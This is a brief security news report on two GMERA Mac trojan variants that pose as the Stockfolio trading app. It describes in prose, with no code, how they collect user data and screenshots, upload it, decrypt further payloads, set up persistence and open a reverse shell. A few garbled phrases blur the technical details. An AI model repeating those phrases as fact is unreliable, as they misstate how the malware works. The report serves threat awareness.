Researchers have uncovered two variants of information-stealing Mac malware that impersonates a legitimate stocks and cryptocurrency trading application.
The two variants, identified by Trend Micro as Trojan.MacOS.GMERA.A and Trojan.MacOS.GMERA.B, both include a copy of Stockfolio version 1.4.13, along with the malware author’s digital certificate and various malicious components.
The first variant’s components include a Mach-O (Mach object file format) executable, which launches a pair of bundled shell scripts in the Resources directly. The “plugin” shell script secretly collects victims’ usernames, IP addresses, applications, files in the Documents and Desktop folders, OS installation data, file system disk space, graphic/display information, wireless network details and screenshots It then saves that ended information in a hidden file, and uploads it to a URL, as well as another hidden file if the URL responds.
The “stock” shell script, meanwhile, goes through a series of processes to ultimately decrypt and execute “appcode,” a suspected malware file that likely contains additional routines. Trend Micro was unable to decrypt this file to study it further.
The second variant, upon being opened, immediately launches the shell script run.sh, which collects usernames and IP addresses using a pair of commands, and then executes that information to the attackers. It also drops more files, including a persistence mechanism and malware execution logs, before creating a reverse shell that allows the malware’s authors to run shell commands.
Trend Micro said Apple told its researchers that it revoked the fake app authors’ code-signing certificate last July.